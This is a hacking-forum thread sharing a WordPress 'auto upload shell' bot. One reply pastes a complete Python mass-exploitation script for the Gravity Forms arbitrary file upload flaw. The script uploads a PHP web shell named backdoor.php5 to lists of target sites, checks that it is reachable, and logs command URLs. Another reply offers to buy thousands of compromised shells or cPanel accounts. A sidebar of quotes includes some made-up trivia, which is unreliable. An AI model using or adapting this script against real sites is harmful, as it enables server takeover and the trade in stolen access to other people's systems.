Bot Shell WP Wordpress Auto Upload Shell In Plugin (1 Viewer)

Nicsx · Oct 18, 2021

Ni hao!
I want to share my bot about Wordpress, I see some people here looking for it
Use Python2 to run and install bs4 before run (pip install bs4)

Download:

To view the content, you need to Sign In or Register.

Virus Total: https://www.virustotal.com/gui/file/4e82565a3c44e43a92afdef18d7cdd53fcd7c7937a0525c24109f1ed18630a73

moh26775 · Nov 6, 2022

thanks

bvcvbcvncxzcvzxvc · Nov 8, 2022

Okay nice thanks

arimgocim · Nov 14, 2022

Nicsx said:
Ni hao!
I want to share my bot about Wordpress, I see some people here looking for it
Use Python2 to run and install bs4 before run (pip install bs4)

Download:
*** Hidden text: cannot be quoted. ***

View attachment 12185

Virus Total: https://www.virustotal.com/gui/file/4e82565a3c44e43a92afdef18d7cdd53fcd7c7937a0525c24109f1ed18630a73

hello

Ncot1 · Nov 14, 2022

Exploiter

bx12 · Nov 15, 2022

thnx brother

tahob92764 · Nov 28, 2022

#!/usr/bin/python
#############################################################################################################
# WordPress Plugin Automated Shell uploading #
# Gravity Forms [WP] - Arbitrary File Upload #
# Vulnerable Version(s) : 1.8.19 (and below) #
# Source : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html #
# Author: Nasir khan (r0ot h3x49) #
#############################################################################################################
import os
import sys
import time
import json
import optparse
import urllib.request as urllib2

from pprint import pprint
from colorama import init
from colorama import Fore
from colorama import Style

# Initialize colorama ..
init(autoreset=True, convert=bool(os.name=="nt"))
# foreground color ..
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
# color style ..
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT

def _banner():
ban = """{}{}+------------------------------------------------------------+
| _____ _ _ ______ _ _ |
| / ____| (_) | | ____| | | | |
| | | __ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___ |
| | | |_ | '__/ _` \ \ / / | __| | | | __/ _` | | / __| |
| | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \ |
| \_____|_| \__,_| \_/ |_|\__|\__, |_| \__,_|_|_|___/ |
| __/ | |
| |___/ - By r0ot@h3x49 |
| ---------------------------------------------------------- |
| WordPress Plugin Gravity Form |
| Gravity Forms [WP] - Arbitrary File Upload |
| Version(s) : 1.8.19 (and below) |
+------------------------------------------------------------+""".format(fc, sb)
return ban

def _prepare(target):
if "http://" in target or "https://" in target:
_url = '{}/?gf_page=upload'.format(target)
else:
_url = 'http://{}/?gf_page=upload'.format(target)
_data = '<?php system($_GET["cmd"]); ?>&field_id=3&form_id=1&gform_unique_id=../../../../&name=backdoor.php5'
return _url, _data

def _prepare_verify_url(target):
if "http://" in target or "https://" in target:
_url = '{}/wp-content/_input_3_backdoor.php5'.format(target)
else:
_url = 'http://{}/wp-content/_input_3_backdoor.php5'.format(target)
return _url

def _verify(url):
try:
resp = urllib2.urlopen(url).read()
except urllib2.HTTPError as e:
_json_resp = {"status" : "failed"}
except urllib2.URLError as e:
_json_resp = {"status" : "failed"}
except KeyboardInterrupt as e:
sys.stdout.write('\n{}{}[-] User Interrupted\n'.format(fr, sd))
exit(0)
else:
if 'backdoor.php5' in resp:
_json_resp = {"status" : "ok"}
else:
_json_resp = {"status" : "failed"}
return _json_resp

def _exploit(url, payload=None):
try:
if payload:
payload = payload.encode("utf-8")
resp = urllib2.urlopen(url, data=payload)
except urllib2.HTTPError as e:
_json_resp = {"status" : "failed"}
except urllib2.URLError as e:
_json_resp = {"status" : "failed"}
except KeyboardInterrupt as e:
sys.stdout.write('\n{}{}[-] User Interrupted\n'.format(fr, sd))
exit(0)
else:
try:
_json_resp = json.load(resp)
except:
_json_resp = {"status" : "failed"}
return _json_resp

def _is_vulnerable(url):
try:
resp = urllib2.urlopen(url)
except urllib2.HTTPError as e:
_json_resp = {"status" : "failed"}
except urllib2.URLError as e:
_json_resp = {"status" : "failed"}
except KeyboardInterrupt as e:
sys.stdout.write('\n{}{}[-] User Interrupted\n'.format(fr, sd))
exit(0)
else:
try:
_json_resp = json.load(resp)
except:
_json_resp = {"status" : "failed"}
return _json_resp

def main():
banner = _banner()
usage = '''%prog [-h] [-u "target"] [-t "targets.txt"][-v]'''
parser = optparse.OptionParser(usage=usage,conflict_handler="resolve")

sys.stdout.write('{}\n\n'.format(banner))
parser.add_option("-v", "--vuln",dest="vuln", action='store_true',
help="Only identify if target is vulnerable.")
parser.add_option("-u", dest="target", type="string" , \
help="Target url to check (e.g:- http://abc.com)")
parser.add_option("-t",dest="filename", type="string" , \
help="File containg list of targets (e.g:- <filename>.txt)")

(options, args) = parser.parse_args()
if not options.target and not options.filename:
parser.print_help()
elif options.target and not options.filename:
target = options.target
url, data = _prepare(target)
sys.stdout.write('{}{}[*] {}'.format(fg, sd, target))
response = _is_vulnerable(url)
status = response.get('status')
if status == 'failed':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}not vulnerable{}{})'.format(fg, sd, target, fw, sb, fg, sd))
print("")
elif status == 'error':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}vulnerable{}{})'.format(fg, sd, target, fr, sb, fg, sd))
print("")
if options.vuln:
with open("vulnerable.txt", "a") as f:
f.write('{}\n'.format(target))
f.close()
else:
with open("vulnerable.txt", "a") as f:
f.write('{}\n'.format(target))
f.close()
sys.stdout.write('{}{}[*] trying to exploit '.format(fg, sd))
response = _exploit(url, payload=data)
status = response.get('status')
if status == 'failed':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}failed{}{})'.format(fg, sd, "trying to exploit", fr, sb, fg, sd))
print("")
elif status == 'error':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}failed{}{})'.format(fg, sd, "trying to exploit", fr, sb, fg, sd))
print("")
elif status == 'ok':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}exploited{}{})'.format(fg, sd, "trying to exploit", fc, sb, fg, sd))
print("")
sys.stdout.write('{}{}[*] trying to verify '.format(fg, sd))
url = _prepare_verify_url(target)
response = _verify(url)
status = response.get("status")
if status == "failed":
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}failed{}{})'.format(fg, sd, "trying to verify", fr, sb, fg, sd))
elif status == "ok":
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}successful{}{})'.format(fg, sd, "trying to verify", fg, sb, fg, sd))
print("")
with open("exploited.txt", "a") as f:
f.write('{}?cmd=uname -a\n'.format(url))
f.close()
elif options.filename and not options.target:
filename = options.filename
f_in = open(filename)
targets = set(list(line for line in (l.strip() for l in f_in) if line))
for target in targets:
sys.stdout.write('{}{}[*] {}'.format(fg, sd, target))
url, data = _prepare(target)
response = _is_vulnerable(url)
status = response.get('status')
if status == 'failed':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}not vulnerable{}{})'.format(fg, sd, target, fw, sb, fg, sd))
print("")
elif status == 'error':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}vulnerable{}{})'.format(fg, sd, target, fr, sb, fg, sd))
print("")
if options.vuln:
with open("vulnerable.txt", "a") as f:
f.write('{}\n'.format(target))
f.close()
else:
with open("vulnerable.txt", "a") as f:
f.write('{}\n'.format(target))
f.close()
sys.stdout.write('{}{}[*] trying to exploit '.format(fg, sd))
response = _exploit(url, payload=data)
status = response.get('status')
if status == 'failed':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}failed{}{})'.format(fg, sd, "trying to exploit", fr, sb, fg, sd))
print("")
elif status == 'error':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}failed{}{})'.format(fg, sd, "trying to exploit", fr, sb, fg, sd))
print("")
elif status == 'ok':
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}exploited{}{})'.format(fg, sd, "trying to exploit", fc, sb, fg, sd))
print("")
sys.stdout.write('{}{}[*] trying to verify '.format(fg, sd))
url = _prepare_verify_url(target)
response = _verify(url)
status = response.get("status")
if status == "failed":
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}failed{}{})'.format(fg, sd, "trying to verify", fr, sb, fg, sd))
elif status == "ok":
sys.stdout.write('\r\r\r{}{}[*] {:<50} : ({}{}successful{}{})'.format(fg, sd, "trying to verify", fg, sb, fg, sd))
print("")
with open("exploited.txt", "a") as f:
f.write('{}?cmd=uname -a\n'.format(url))
f.close()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
sys.stdout.write('\n{}{}[-] User Interrupted\n'.format(fr, sd))
exit(0)

zzyinr · Nov 28, 2022

I want to buy 1000+ fresh shell or cpanel
If u sell
Please contact me
Telegram: @zzyinr
thanks

d4ng3r · Nov 30, 2022

Nicsx said:
Ni hao!
I want to share my bot about Wordpress, I see some people here looking for it
Use Python2 to run and install bs4 before run (pip install bs4)

Download:
*** Hidden text: cannot be quoted. ***

View attachment 12185

Virus Total: https://www.virustotal.com/gui/file/4e82565a3c44e43a92afdef18d7cdd53fcd7c7937a0525c24109f1ed18630a73

thankkkkkkkkkks

azamuer · Jan 24, 2023

Nicsx said:
Ni hao!
I want to share my bot about Wordpress, I see some people here looking for it
Use Python2 to run and install bs4 before run (pip install bs4)

Download:
*** Hidden text: cannot be quoted. ***

View attachment 12185

Virus Total: https://www.virustotal.com/gui/file/4e82565a3c44e43a92afdef18d7cdd53fcd7c7937a0525c24109f1ed18630a73

ààààààèjjjkkkkkkk

sycosunnyhere · Feb 4, 2023

Nicsx said:
Ni hao!
I want to share my bot about Wordpress, I see some people here looking for it
Use Python2 to run and install bs4 before run (pip install bs4)

Download:
*** Hidden text: cannot be quoted. ***

View attachment 12185

Virus Total: https://www.virustotal.com/gui/file/4e82565a3c44e43a92afdef18d7cdd53fcd7c7937a0525c24109f1ed18630a73

tnxxxx

Bot Shell WP Wordpress Auto Upload Shell In Plugin (1 Viewer)

Currently reading: Bot Shell WP Wordpress Auto Upload Shell In Plugin (1 Viewer)

"S'all Good, Man."​

"Perfection Is The Enemy Of Perfectly Adequate."​

"Money Is The Point!"​

"I Travel In Worlds You Can't Even Imagine."​

"Say Nothing, You Understand? Get A Lawyer!"​

“Confidence is good. Facts on your side, better.” ​

“Facts are facts.”​

“Sometimes the good guys win.”​

“I’m not good at building shit, you know? I’m excellent at tearing it down.”​

“Money is not beside the point… Money is the point.”​

“Whoa, whoa. Hold up. What the hell happened to you? I get it, the first rule of Fight Club, right?”​

“A good magician never reveals his secrets.”​

“Got to look successful to be successful.”​

“The lesson is, if you’re gonna be a criminal, do your homework.” ​

“If I had to do it all over again, I would maybe do some things differently. I just thought you should know that.”​

“Some men aren't looking for anything logical. They can't be bought, bullied, reasoned or negotiated with. Some men just want to watch the world burn.”​

"Ernest Hemingway once wrote, "The world is a fine place and worth fighting for." I agree with the second part."​

“There’s no better way to destroy someone’s life than to uncover their secrets.”​

“Hackers are breaking the systems for profit. Before, it was about intellectual curiosity and pursuit of knowledge and thrill, and now hacking is big business.”​

“Hackers often describe what they do as playfully creative problem-solving.”​

“Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours."​

“While many hackers have the knowledge, skills, and tools to attack computer systems, they generally lack the motivation to cause violence or severe economic or social harm.”​

“Very smart people are often tricked by hackers, by phishing. I don’t exclude myself from that. It’s about being smarter than a hacker. Not about being smart.”​

“At the end of the day, my goal was to be the best hacker.”​

“Humiliation is the favorite currency of the hacker.”​

“The hacker didn’t succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through.”​

"Rules. Without Them We Live With The Animals.”​

“Consider This A Professional Courtesy.”​

"I've Lived My Life My Way, And I'll Die My Way."​

"You stabbed the devil in the back, and forced him back into the life that he had just left."​

"You Want A War, Or Do You Want To Just Give Me A Gun?"​

"Leave one wolf alive and the sheep are never safe."​

"When you play the game of thrones, you win or you die. There is no middle ground."​

"It's not easy to see something that’s never been before: A good world."​

"I believe in second chances. I don't believe in third chances."​

"If you only trust the people you grew up with, you won't make many allies."​

"A man with no motive is a man no one suspects. Always keep your foes confused: If they don't know who you are, what you want—they can't know what you plan to do next."​

"Never forget what you are, the rest of the world will not. Wear it like armor and it can never be used to hurt you."​

"I try to know as many people as I can. You never know which one you'll need."​

"It's hard to put a leash on a dog once you've put a crown on its head."​

“Everything before the word ‘but’ is horseshit.”​

“A lion doesn’t concern himself with the opinions of a sheep.”​

“Nothing FUCKS you harder than time.”​

“You pray for rain, you gotta deal with the mud too. That’s a part of it.”​

“I’d be more frightened by not using whatever abilities I’d been given.”​

“Luck is where opportunity meets preparation.”​

“If you have an enemy, then learn and know your enemy, don’t just be mad at him or her.”​

“Every failed experiment is one step closer to success.”​

When you work on a computer your hands travel 20 kilometres a day!​

Fugaku supercomputer is the world’s fastest computer. The $1-billion supercomputer has 7,630,848 cores, requires 29,899 kilowatts of electricity, and can execute 442,010 teraFLOPs.​

“Every day, about 317 million new viruses are discovered.​

“Microsoft’s founder, the infamous Bill Gates, was actually a college dropout."​

Did you know?​

“On average, a human blinks 20 times per minute, but using a computer reduces it to 7."​

Did you know?​

“The most common password for a computer and social media platforms is 123456."​

Did you know?​

“There are eight varieties of computers: mainframe, supercomputer, workstation, personal computer, Apple Macintosh, laptop, tablet, and smartphone."​

Did you know?​

“Linux leads the industry as it is used by Google, Facebook, Twitter, and Amazon."​

Did you know?​

“NASA computers were hijacked by a 15-year-old, resulting in a 21-day halt."​

Did you know?​

“You may heat a room with Gaming PCs more effectively than a heater."​

Did you know?​

“Physical money accounts for just around 10% of global cash, while the rest is stored on computers."​

Did you know?​

“YouTube actually started as a dating website." (Oh crap xD)​

Did you know?​

“Before they could progress as stable brands, Microsoft, HP, and Apple began manufacturing computers in their Garages."​

Did you know?​

“For every 12 million email spams, only one gets a reply."​

Did you know?​

“Banks and other corporate giants hire white hats or “good hackers” to help fix security issues and prevent system infiltration."​

Did you know?​

“If Earth stopped rotating for 1 second, everyone would die."​

Did you know?​

“If someone made a sound of 1100db or larger a black hole would form sucking in our whole solar system."​

Currently reading:
Bot Shell WP Wordpress Auto Upload Shell In Plugin (1 Viewer)

"S'all Good, Man."

"Perfection Is The Enemy Of Perfectly Adequate."

"Money Is The Point!"

"I Travel In Worlds You Can't Even Imagine."

"Say Nothing, You Understand? Get A Lawyer!"

“Confidence is good. Facts on your side, better.”

“Facts are facts.”

“Sometimes the good guys win.”

“I’m not good at building shit, you know? I’m excellent at tearing it down.”

“Money is not beside the point… Money is the point.”

“Whoa, whoa. Hold up. What the hell happened to you? I get it, the first rule of Fight Club, right?”

“A good magician never reveals his secrets.”

“Got to look successful to be successful.”

“The lesson is, if you’re gonna be a criminal, do your homework.”

“If I had to do it all over again, I would maybe do some things differently. I just thought you should know that.”

“Some men aren't looking for anything logical. They can't be bought, bullied, reasoned or negotiated with. Some men just want to watch the world burn.”

"Ernest Hemingway once wrote, "The world is a fine place and worth fighting for." I agree with the second part."

“There’s no better way to destroy someone’s life than to uncover their secrets.”

“Hackers are breaking the systems for profit. Before, it was about intellectual curiosity and pursuit of knowledge and thrill, and now hacking is big business.”

“Hackers often describe what they do as playfully creative problem-solving.”

“Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours."

“While many hackers have the knowledge, skills, and tools to attack computer systems, they generally lack the motivation to cause violence or severe economic or social harm.”

“Very smart people are often tricked by hackers, by phishing. I don’t exclude myself from that. It’s about being smarter than a hacker. Not about being smart.”

“At the end of the day, my goal was to be the best hacker.”

“Humiliation is the favorite currency of the hacker.”

“The hacker didn’t succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through.”

"Rules. Without Them We Live With The Animals.”

“Consider This A Professional Courtesy.”

"I've Lived My Life My Way, And I'll Die My Way."

"You stabbed the devil in the back, and forced him back into the life that he had just left."

"You Want A War, Or Do You Want To Just Give Me A Gun?"

"Leave one wolf alive and the sheep are never safe."

"When you play the game of thrones, you win or you die. There is no middle ground."

"It's not easy to see something that’s never been before: A good world."

"I believe in second chances. I don't believe in third chances."

"If you only trust the people you grew up with, you won't make many allies."

"A man with no motive is a man no one suspects. Always keep your foes confused: If they don't know who you are, what you want—they can't know what you plan to do next."

"Never forget what you are, the rest of the world will not. Wear it like armor and it can never be used to hurt you."

"I try to know as many people as I can. You never know which one you'll need."

"It's hard to put a leash on a dog once you've put a crown on its head."

“Everything before the word ‘but’ is horseshit.”

“A lion doesn’t concern himself with the opinions of a sheep.”

“Nothing FUCKS you harder than time.”

“You pray for rain, you gotta deal with the mud too. That’s a part of it.”

“I’d be more frightened by not using whatever abilities I’d been given.”

“Luck is where opportunity meets preparation.”

“If you have an enemy, then learn and know your enemy, don’t just be mad at him or her.”

“Every failed experiment is one step closer to success.”

When you work on a computer your hands travel 20 kilometres a day!

Fugaku supercomputer is the world’s fastest computer. The $1-billion supercomputer has 7,630,848 cores, requires 29,899 kilowatts of electricity, and can execute 442,010 teraFLOPs.

“Every day, about 317 million new viruses are discovered.

“Microsoft’s founder, the infamous Bill Gates, was actually a college dropout."

Did you know?

“On average, a human blinks 20 times per minute, but using a computer reduces it to 7."

Did you know?

“The most common password for a computer and social media platforms is 123456."

Did you know?

“There are eight varieties of computers: mainframe, supercomputer, workstation, personal computer, Apple Macintosh, laptop, tablet, and smartphone."

Did you know?

“Linux leads the industry as it is used by Google, Facebook, Twitter, and Amazon."

Did you know?

“NASA computers were hijacked by a 15-year-old, resulting in a 21-day halt."

Did you know?

“You may heat a room with Gaming PCs more effectively than a heater."

Did you know?

“Physical money accounts for just around 10% of global cash, while the rest is stored on computers."

Did you know?

“YouTube actually started as a dating website." (Oh crap xD)

Did you know?

“Before they could progress as stable brands, Microsoft, HP, and Apple began manufacturing computers in their Garages."

Did you know?

“For every 12 million email spams, only one gets a reply."

Did you know?

“Banks and other corporate giants hire white hats or “good hackers” to help fix security issues and prevent system infiltration."

Did you know?

“If Earth stopped rotating for 1 second, everyone would die."

Did you know?

“If someone made a sound of 1100db or larger a black hole would form sucking in our whole solar system."

“People shouldn't be afraid of their government. Governments should be afraid of their people.”